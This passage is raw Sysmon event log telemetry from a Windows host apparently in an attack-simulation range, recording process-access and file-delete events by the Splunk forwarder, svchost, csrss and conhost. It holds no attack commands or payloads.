Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9259DE27FB27BC71C5DEF3768F2D0B8A,SHA256=852ECB8AE67484B442E3381E075081EDDE7A9400F00D753C0B4AA052C39EE90D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000015817Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:31.767{E5A8D418-E3D3-63C7-F101-00000000B002}28081276C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015816Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:31.595{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E3D3-63C7-F101-00000000B002}2808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015815Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:31.595{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015814Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:31.595{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015813Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:31.595{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015812Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:31.595{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015811Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:31.595{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015810Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:31.595{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015809Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:31.595{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015808Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:31.595{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015807Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:31.595{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015806Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:31.595{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E3D3-63C7-F101-00000000B002}2808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000015805Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:31.595{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E3D3-63C7-F101-00000000B002}2808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000015804Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:31.596{E5A8D418-E3D3-63C7-F101-00000000B002}2808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000015803Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:31.228{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=26C9DCD52CC793961D242AB5B6EB50FE,SHA256=9E2E2329B8BFE39A9EB91381052BBE19C70129453D556974A3D9EEE7EEB8FF74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015802Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:31.055{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6368942BF4C283F30E196B8CFBE52F70,SHA256=7FB118051D9ABE3AA06A204E344BBCDCFFB756E0FEAC074CCFB8F7F98A2FD08F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000015848Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.882{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E3D4-63C7-F301-00000000B002}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015847Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.882{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015846Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.882{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015845Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.882{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015844Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.882{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015843Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.882{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015842Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.882{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015841Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.882{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015840Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.882{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015839Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.882{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015838Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.882{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E3D4-63C7-F301-00000000B002}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000015837Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.882{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E3D4-63C7-F301-00000000B002}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program 